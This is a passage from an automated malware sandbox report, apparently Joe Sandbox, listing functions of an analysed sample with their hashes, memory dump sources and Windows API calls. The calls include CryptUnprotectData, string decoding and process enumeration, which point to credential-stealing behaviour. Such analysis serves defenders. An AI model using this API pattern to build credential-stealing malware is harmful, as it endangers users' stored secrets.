                        • Instruction Fuzzy Hash: 3262E8F3A082049FE304AF29EC8167AF7E9EF94720F16893DEAC4C7744E63558158697
                        Function 007F7622 Relevance: 9.1, Strings: 6, Instructions: 1621COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 2$z$AGvy$fs![$z"~g$a;}$wvy
                        • API String ID: 0-1479340695
                        • Opcode ID: 09f2118c418a957310edc9fbdee2efb3b69426134bd08dbbab56d72979783bab
                        • Instruction ID: 383f6e72d06759ec22d0edc48d857593ffb5ea5905e1bd3cd460270e9a6ac4f9
                        • Opcode Fuzzy Hash: 09f2118c418a957310edc9fbdee2efb3b69426134bd08dbbab56d72979783bab
                        • Instruction Fuzzy Hash: AFB207F3A082149FD3046E2DEC8567AFBE9EF94320F1A493DEAC5C7744E63598018697
                        Function 00462C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00462C42
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00462C49
                        • GetTimeZoneInformation.KERNEL32(?), ref: 00462C58
                        • wsprintfA.USER32 ref: 00462C83
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID: wwww
                        • API String ID: 3317088062-671953474
                        • Opcode ID: 5fc993e23f1fa07df43abaa798d20472b1e57531e2478d8bc04fd6c4a54a817a
                        • Instruction ID: 200d80aee3614c143d0788576d49af853204f5332086de44b1f33d47dc8f93f3
                        • Opcode Fuzzy Hash: 5fc993e23f1fa07df43abaa798d20472b1e57531e2478d8bc04fd6c4a54a817a
                        • Instruction Fuzzy Hash: 81012BB1A40604ABD71C9F58DC09F6EBB6EEB84721F10432AF91ADB3C0D77819008AE5
                        Function 007F6496 Relevance: 8.4, Strings: 6, Instructions: 880COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $%uo$$%uo$1&?n$;'|j$CG~$Mm1_
                        • API String ID: 0-2475217436
                        • Opcode ID: cd27ee949425bee75b3bc4e4381c04a54c318f1a5c74da144356f73792c11335
                        • Instruction ID: 2dd2d8bbc98badbe2f5b86224a6f30557c5f1e1e854379cf99f17e7772e14b78
                        • Opcode Fuzzy Hash: cd27ee949425bee75b3bc4e4381c04a54c318f1a5c74da144356f73792c11335
                        • Instruction Fuzzy Hash: 84423AF3608308AFE3046E2DEC85A7AFBD9EBD4720F1A463DE6C4C7744E93558058696
                        Function 00447750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0044775E
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00447765
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0044778D
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004477AD
                        • LocalFree.KERNEL32(?), ref: 004477B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: abb174d78248a90af565e9adff6f7778fa624a199f4a8199c1159dd84babe0f9
                        • Instruction ID: aba25d843c996fe0a2fc107a638d09359dcbda40c241e0f0b8fcebd75127eb54
                        • Opcode Fuzzy Hash: abb174d78248a90af565e9adff6f7778fa624a199f4a8199c1159dd84babe0f9
                        • Instruction Fuzzy Hash: 58012975750304BFEB14DBA4DC4AFAA7B79E744B15F104155FB09EB2C0D6B09940CBA4
                        Function 00801664 Relevance: 6.6, Strings: 4, Instructions: 1572COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %%Oh$[3W~$m3V$sk
                        • API String ID: 0-3102419359
                        • Opcode ID: 74f019650383fc2440386297294cff37e49b9ab0ef11067cdc5e38f7768afe54
                        • Instruction ID: 4c029c7be015d0e741c4c91e20b1480bbd7f16fc0420fbc03f742753f026307d
                        • Opcode Fuzzy Hash: 74f019650383fc2440386297294cff37e49b9ab0ef11067cdc5e38f7768afe54
                        • Instruction Fuzzy Hash: 40B2D5F360C204AFE304AE29EC8567AFBE9EF94720F16493DEAC4C3740E67558458697
                        Function 007FC8C4 Relevance: 6.4, Strings: 4, Instructions: 1438COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: -?s_$P)8$o ,$:O/
                        • API String ID: 0-22989051
                        • Opcode ID: 663f77b1abde599addea902e0a384524a94c5135f8dcc1fd1689931d49ed30ca
                        • Instruction ID: e626d2ab0e8660a62671379e3cd6174c1de686b4b093109c6bbb706f1298cd12
                        • Opcode Fuzzy Hash: 663f77b1abde599addea902e0a384524a94c5135f8dcc1fd1689931d49ed30ca
                        • Instruction Fuzzy Hash: 16A207F360C200AFE3146E69EC85B7AFBE9EF94720F16493DEAC4C3744E63558058696
                        Function 00463A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004671FE
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00463A96
                        • Process32First.KERNEL32(00000000,00000128), ref: 00463AA9
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00463ABF
                          • Part of subcall function 00467310: lstrlen.KERNEL32(------,00445BEB), ref: 0046731B
                          • Part of subcall function 00467310: lstrcpy.KERNEL32(00000000), ref: 0046733F
                          • Part of subcall function 00467310: lstrcat.KERNEL32(?,------), ref: 00467349
                          • Part of subcall function 00467280: lstrcpy.KERNEL32(00000000), ref: 004672AE
                        • CloseHandle.KERNEL32(00000000), ref: 00463BF7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: f68bb144d7d37f1afbe18d008a3a665bf035f076b5c45cc2d8e1c306d8cf9738
                        • Instruction ID: 519d71f713da9d066cbdcf3b076cea57dad9db08e02052f24deb36b0580e2f94
                        • Opcode Fuzzy Hash: f68bb144d7d37f1afbe18d008a3a665bf035f076b5c45cc2d8e1c306d8cf9738
                        • Instruction Fuzzy Hash: 13810831900244CFC718CF15D848B96B7F2FB45729F29C1AAD4089B3A2E77AAD82CF55
                        Function 0044EA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0044EA76
                        • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0044EA7E
                        • lstrcat.KERNEL32(0046CFEC,0046CFEC), ref: 0044EB27
                        • lstrcat.KERNEL32(0046CFEC,0046CFEC), ref: 0044EB49
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: e9c24425b161894280645c6445e0ba794a97ba0f72a6d97d6d708cf033defd29
                        • Instruction ID: 8fe7f196b29679dadbea16e811b395e472d139542bebb213782ceb5401620901
                        • Opcode Fuzzy Hash: e9c24425b161894280645c6445e0ba794a97ba0f72a6d97d6d708cf033defd29
                        • Instruction Fuzzy Hash: CA310975A40118ABD710DB58DC49FEFB77EEF44705F00406AF90DE3280DBB45A448BA6
                        Function 004640B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004640CD
                        • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004640DC
                        • RtlAllocateHeap.NTDLL(00000000), ref: 004640E3
                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00464113
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptHeapString$AllocateProcess
                        • String ID:
                        • API String ID: 3825993179-0
                        • Opcode ID: a20f7c995d84c894126608523be7e214fc1da4157f0e1b950dcdd37c6bd2b756
                        • Instruction ID: c4e32fdf9c74ca88a1eb1cfc1a8ebc784037b75ab144d916e1836c52ca2e07f7
                        • Opcode Fuzzy Hash: a20f7c995d84c894126608523be7e214fc1da4157f0e1b950dcdd37c6bd2b756
                        • Instruction Fuzzy Hash: 5D011E70600205ABDB149FA5EC49B6B7BAEEF85311F108159BD0987340EA719D80CB65
                        Function 00462B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0046A3D0,000000FF), ref: 00462B8F
                        • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00462B96
                        • GetLocalTime.KERNEL32(?,?,00000000,0046A3D0,000000FF), ref: 00462BA2
                        • wsprintfA.USER32 ref: 00462BCE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 38fd0bcee562c2f4c4af70c4ef455cb153869799af4e00c18559044fb77c79b5
                        • Instruction ID: cc65214401c8d9a9c0ec82258c3b21977512a3b05a0e6aabc5ca3c3799ac9d07
                        • Opcode Fuzzy Hash: 38fd0bcee562c2f4c4af70c4ef455cb153869799af4e00c18559044fb77c79b5
                        • Instruction Fuzzy Hash: AC0140B2954528ABCB149BD9DD49FBEB7FDFB4CB11F00011AFA05A2290E7785840C7B5
                        Function 00449B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00449B3B
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00449B4A
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00449B61
                        • LocalFree.KERNEL32 ref: 00449B70
                        Memory Dump Source
